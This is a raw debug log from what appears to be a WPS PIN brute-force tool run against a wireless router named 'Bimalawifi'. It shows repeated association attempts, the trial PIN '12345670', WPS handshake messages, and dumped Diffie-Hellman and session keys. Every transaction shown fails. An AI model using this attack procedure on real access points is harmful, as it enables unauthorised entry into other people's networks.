DH: shared key - hexdump(len=192): 54 ac fd f2 ec c9 4b 8c 0a c1 63 06 28 2f ac a1 51 1f e9 3a e5 98 f5 f1 d6 62 57 f0 28 d6 0a c0 19 8d d6 cc 66 4c ee 4b 0c 5b da 27 a2 f2 a7 b6 ee 54 56 7e 0a 40 c7 43 a6 cc 68 5e 16 3b 32 32 d8 22 89 6e 3d d1 de e6 9f f9 7e a4 74 16 36 b2 00 40 38 9c 46 5b 06 62 6c 3e b6 92 28 be 9a 38 cd 34 8b 0f cb d6 d3 da 5d fd 5f 3f b7 10 c7 66 a9 25 e1 d0 f7 95 45 d3 06 b6 ae 85 cf c4 44 a3 92 34 0d 11 6e 6e 4a c3 fe 2f 77 46 f2 7d 54 ac 28 46 f6 45 ea 25 75 c0 6c d0 e7 35 6a 31 54 ad e6 68 44 d0 b8 70 34 00 c8 55 e2 1d 35 f5 c6 52 f2 8c d6 61 3d 56 79 e7 c4 ef 4b 63 51 0a c5 22
WPS: DH shared key - hexdump(len=192): 54 ac fd f2 ec c9 4b 8c 0a c1 63 06 28 2f ac a1 51 1f e9 3a e5 98 f5 f1 d6 62 57 f0 28 d6 0a c0 19 8d d6 cc 66 4c ee 4b 0c 5b da 27 a2 f2 a7 b6 ee 54 56 7e 0a 40 c7 43 a6 cc 68 5e 16 3b 32 32 d8 22 89 6e 3d d1 de e6 9f f9 7e a4 74 16 36 b2 00 40 38 9c 46 5b 06 62 6c 3e b6 92 28 be 9a 38 cd 34 8b 0f cb d6 d3 da 5d fd 5f 3f b7 10 c7 66 a9 25 e1 d0 f7 95 45 d3 06 b6 ae 85 cf c4 44 a3 92 34 0d 11 6e 6e 4a c3 fe 2f 77 46 f2 7d 54 ac 28 46 f6 45 ea 25 75 c0 6c d0 e7 35 6a 31 54 ad e6 68 44 d0 b8 70 34 00 c8 55 e2 1d 35 f5 c6 52 f2 8c d6 61 3d 56 79 e7 c4 ef 4b 63 51 0a c5 22
WPS: DHKey - hexdump(len=32): 67 8b 16 16 84 0f 53 a0 a0 fc 0f 67 81 22 1c 5c 6a a4 8f 78 57 9b 1b f4 a5 b3 c3 65 79 98 f2 c4
WPS: KDK - hexdump(len=32): 24 27 55 60 a2 ca 27 41 c6 ec b3 b5 7d 73 ab 3e 2e 4e f5 90 ae d4 2d 0e cd 81 26 af fe d0 9b b7
WPS: AuthKey - hexdump(len=32): a0 e5 d1 c3 a2 28 4c e1 ee 35 47 e6 b5 2a 39 48 94 9b d7 0c ee ac 69 62 e8 f3 5b 1b 7f 5f 92 43
WPS: KeyWrapKey - hexdump(len=16): a5 8d 50 59 19 70 bd d6 cf 4f 65 b7 37 52 91 ec
WPS: EMSK - hexdump(len=32): 6a a8 7e 6c 63 31 73 a1 4c 4f b4 8b 48 d2 46 62 3a 9c 05 cd 2c 9e 44 7e 1d 0e 3f d7 55 91 3b 7d
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=422 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: Unexpected state (15) for receiving M1
WPS: returning
[+] Received M1 message
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
send_packet called from send_termination() send.c:142
[!] WPS transaction failed (code: 0x03), re-trying last pin
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Mismatch in registrar nonce
[+] Received M3 message
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
send_packet called from send_termination() send.c:142
[!] WPS transaction failed (code: 0x03), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=422 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
WPS: Enrollee MAC Address a8:32:9a:00:77:fe
WPS: Enrollee Nonce - hexdump(len=16): 01 a4 ce 18 6a d6 8a 7f 2b 1e ce a5 73 90 c8 c0
WPS: Enrollee Authentication Type flags 0x27
WPS: No match in supported authentication types (own 0x0 Enrollee 0x27)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xf
WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x86 [Ethernet] [Label] [PBC]
WPS: Prefer PSK format key due to Enrollee not supporting display
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=15):
57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
WPS: Model Name - hexdump_ascii(len=7):
52 54 4c 38 36 37 31 RTL8671
WPS: Model Number - hexdump_ascii(len=13):
45 56 2d 32 30 30 36 2d 30 37 2d 32 37 EV-2006-07-27
WPS: Serial Number - hexdump_ascii(len=15):
31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=15):
57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 55 2d 53 68 3f 89 69 bb 0e 6f c4 97 89 9d 48 d9
WPS: UUID-R - hexdump(len=16): 4c 9e d4 cc b6 ee 72 10 de 46 5f 1d 9e 0b 37 ad
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 99 38 36 74 39 e2 1f 58 0a 6c 9a ee 10 e3 60 54 13 d6 87 24 2e 35 1d 97 ee 7a 8b c1 7a 5e 4f 76 df 4d 18 3b 60 99 a4 6f 3b b9 2c 13 c2 0c 53 83 cf 53 04 33 b5 6d 5b f7 79 5c 7c 7d 10 8c dc 89 f2 62 5b 20 9d 14 75 76 3e c9 02 41 86 81 e7 da 41 a1 b8 68 b9 30 cb 57 33 7f 92 4b 11 5c 1b f3 26 24 ed 4e 6e 7d 05 c1 22 8c ba dd 9b b0 64 74 20 3e a7 32 ef 2c 2b 5c 17 93 04 e5 09 37 01 9a 20 6a 17 41 4e 82 09 eb a8 6c 50 a6 d1 a3 81 c0 63 9f fa 0a 83 22 dc 49 fc cb 44 ee 4b 81 68 4e 6b d3 66 f1 4a b5 36 2d 32 e5 23 de db 68 72 4c e5 2c 64 f3 8c 8a cf 30 3c 0b b5 09 54 24 19 e8
DH: public value - hexdump(len=192): 3b 89 40 ea 0c 86 93 f2 6d 98 d1 29 80 0c 2c ee a5 05 8a 32 a0 40 cb 29 2a 1e c5 0b ac ae 76 ec 10 b1 27 6f 5c 4f 0c 86 a7 74 42 c3 9d 94 46 fe 0c 87 25 f5 29 13 bf c9 62 47 ba 32 69 18 ef 1b 1d 68 c1 1c 7a 73 03 58 80 1f 66 c3 88 57 cc a0 c8 20 45 43 2a fb 06 da 1d 59 cb 8c 91 a6 54 8c 6a e2 ae f2 26 c0 4a 88 38 83 86 61 1e e7 c8 d6 9e a7 94 44 31 a5 2f 7a 77 c8 ea dc d9 6a bb e5 d2 09 cb 01 4e 99 8e 5d 25 78 06 b4 05 1d 19 3b 7f 65 21 25 d7 74 d8 f2 0e cc b8 90 5b cd 50 e7 f5 fe b2 9d 5f 2f fd d8 b1 e3 5d 41 c6 93 94 9c 4c c0 04 0f a6 d0 0e 39 aa 51 dd 9e 5c 51 10 94
WPS: DH Private Key - hexdump(len=192): 99 38 36 74 39 e2 1f 58 0a 6c 9a ee 10 e3 60 54 13 d6 87 24 2e 35 1d 97 ee 7a 8b c1 7a 5e 4f 76 df 4d 18 3b 60 99 a4 6f 3b b9 2c 13 c2 0c 53 83 cf 53 04 33 b5 6d 5b f7 79 5c 7c 7d 10 8c dc 89 f2 62 5b 20 9d 14 75 76 3e c9 02 41 86 81 e7 da 41 a1 b8 68 b9 30 cb 57 33 7f 92 4b 11 5c 1b f3 26 24 ed 4e 6e 7d 05 c1 22 8c ba dd 9b b0 64 74 20 3e a7 32 ef 2c 2b 5c 17 93 04 e5 09 37 01 9a 20 6a 17 41 4e 82 09 eb a8 6c 50 a6 d1 a3 81 c0 63 9f fa 0a 83 22 dc 49 fc cb 44 ee 4b 81 68 4e 6b d3 66 f1 4a b5 36 2d 32 e5 23 de db 68 72 4c e5 2c 64 f3 8c 8a cf 30 3c 0b b5 09 54 24 19 e8
WPS: DH own Public Key - hexdump(len=192): 3b 89 40 ea 0c 86 93 f2 6d 98 d1 29 80 0c 2c ee a5 05 8a 32 a0 40 cb 29 2a 1e c5 0b ac ae 76 ec 10 b1 27 6f 5c 4f 0c 86 a7 74 42 c3 9d 94 46 fe 0c 87 25 f5 29 13 bf c9 62 47 ba 32 69 18 ef 1b 1d 68 c1 1c 7a 73 03 58 80 1f 66 c3 88 57 cc a0 c8 20 45 43 2a fb 06 da 1d 59 cb 8c 91 a6 54 8c 6a e2 ae f2 26 c0 4a 88 38 83 86 61 1e e7 c8 d6 9e a7 94 44 31 a5 2f 7a 77 c8 ea dc d9 6a bb e5 d2 09 cb 01 4e 99 8e 5d 25 78 06 b4 05 1d 19 3b 7f 65 21 25 d7 74 d8 f2 0e cc b8 90 5b cd 50 e7 f5 fe b2 9d 5f 2f fd d8 b1 e3 5d 41 c6 93 94 9c 4c c0 04 0f a6 d0 0e 39 aa 51 dd 9e 5c 51 10 94
WPS: DH Private Key - hexdump(len=192): 99 38 36 74 39 e2 1f 58 0a 6c 9a ee 10 e3 60 54 13 d6 87 24 2e 35 1d 97 ee 7a 8b c1 7a 5e 4f 76 df 4d 18 3b 60 99 a4 6f 3b b9 2c 13 c2 0c 53 83 cf 53 04 33 b5 6d 5b f7 79 5c 7c 7d 10 8c dc 89 f2 62 5b 20 9d 14 75 76 3e c9 02 41 86 81 e7 da 41 a1 b8 68 b9 30 cb 57 33 7f 92 4b 11 5c 1b f3 26 24 ed 4e 6e 7d 05 c1 22 8c ba dd 9b b0 64 74 20 3e a7 32 ef 2c 2b 5c 17 93 04 e5 09 37 01 9a 20 6a 17 41 4e 82 09 eb a8 6c 50 a6 d1 a3 81 c0 63 9f fa 0a 83 22 dc 49 fc cb 44 ee 4b 81 68 4e 6b d3 66 f1 4a b5 36 2d 32 e5 23 de db 68 72 4c e5 2c 64 f3 8c 8a cf 30 3c 0b b5 09 54 24 19 e8
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
DH: shared key - hexdump(len=192): 16 a3 92 1c a0 e1 e7 3e 67 ac 76 16 26 e9 cb 41 8a b7 7a 9f 78 8d c2 fc 79 7e 64 1b e2 e8 5d ae 6f ad d7 15 a6 cf f5 93 33 af 83 bc 36 82 de 39 d7 e2 b1 4f d9 e6 ae 01 25 59 b7 ba 1d 06 c2 1f cf 94 30 93 c0 88 4d e7 ec 97 0c 1c 0c 25 a5 7b af be d7 a1 4e ba da 8c e1 3f 77 5e dd 26 11 72 1a 13 c2 51 40 6a db b5 2a cb d9 6f 5f 70 2b fa 06 f8 2e 51 38 8f 81 ac fb bd b2 ff c7 a8 c3 2d 40 66 00 a7 08 f0 d1 16 be a8 bb 59 93 e8 0f 6d 7c da 28 85 cd d9 80 ba 72 30 12 7d 9f 5f 83 eb 7d 19 de 72 1c cc 1e 3a c0 50 93 b9 84 05 2f e3 a0 5f f0 69 99 78 d2 8f 18 0c 57 e1 60 8d 18 60
WPS: DH shared key - hexdump(len=192): 16 a3 92 1c a0 e1 e7 3e 67 ac 76 16 26 e9 cb 41 8a b7 7a 9f 78 8d c2 fc 79 7e 64 1b e2 e8 5d ae 6f ad d7 15 a6 cf f5 93 33 af 83 bc 36 82 de 39 d7 e2 b1 4f d9 e6 ae 01 25 59 b7 ba 1d 06 c2 1f cf 94 30 93 c0 88 4d e7 ec 97 0c 1c 0c 25 a5 7b af be d7 a1 4e ba da 8c e1 3f 77 5e dd 26 11 72 1a 13 c2 51 40 6a db b5 2a cb d9 6f 5f 70 2b fa 06 f8 2e 51 38 8f 81 ac fb bd b2 ff c7 a8 c3 2d 40 66 00 a7 08 f0 d1 16 be a8 bb 59 93 e8 0f 6d 7c da 28 85 cd d9 80 ba 72 30 12 7d 9f 5f 83 eb 7d 19 de 72 1c cc 1e 3a c0 50 93 b9 84 05 2f e3 a0 5f f0 69 99 78 d2 8f 18 0c 57 e1 60 8d 18 60
WPS: DHKey - hexdump(len=32): d7 36 10 f2 7e a1 e4 24 cc ac 5d d4 2e 88 10 07 aa 68 e0 65 c8 44 f5 ca 23 32 db 17 5d ab 2a c4
WPS: KDK - hexdump(len=32): 73 8d da d5 ad ce 0e a7 e9 4f 7a 86 33 85 ff eb 46 03 59 29 f1 d2 d8 5e a4 6b 6c b4 21 51 3a 97
WPS: AuthKey - hexdump(len=32): 63 6d 69 4c ce 96 cf 2d e6 98 9a 51 5d f5 a0 be e5 08 fa f2 f1 b8 a0 cf 85 8d 1c 19 98 86 38 a2
WPS: KeyWrapKey - hexdump(len=16): 9b a9 9b 2a b6 b1 5b 94 23 d5 08 59 0a 36 94 0f
WPS: EMSK - hexdump(len=32): 6c 52 2a 37 ec ac 42 29 cd af f7 00 32 e5 ee 91 39 82 6c ad d6 d8 0b dc e9 18 7b f4 17 10 18 98
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (0)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=422 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: Unexpected state (15) for receiving M1
WPS: returning
[+] Received M1 message
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
send_packet called from send_termination() send.c:142
[!] WPS transaction failed (code: 0x03), re-trying last pin
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
send_packet called from send_termination() send.c:142
[!] WPS transaction failed (code: 0x03), re-trying last pin
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:326
send_packet called from authenticate() 80211.c:357
[+] Sending authentication request
send_packet called from associate() 80211.c:410
[+] Sending association request
[+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=422 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
WPS: Enrollee MAC Address a8:32:9a:00:77:fe
WPS: Enrollee Nonce - hexdump(len=16): 02 09 d9 1e 54 8d 41 9d 05 ce d5 c9 4e 35 82 19
WPS: Enrollee Authentication Type flags 0x27
WPS: No match in supported authentication types (own 0x0 Enrollee 0x27)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xf
WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x86 [Ethernet] [Label] [PBC]
WPS: Prefer PSK format key due to Enrollee not supporting display
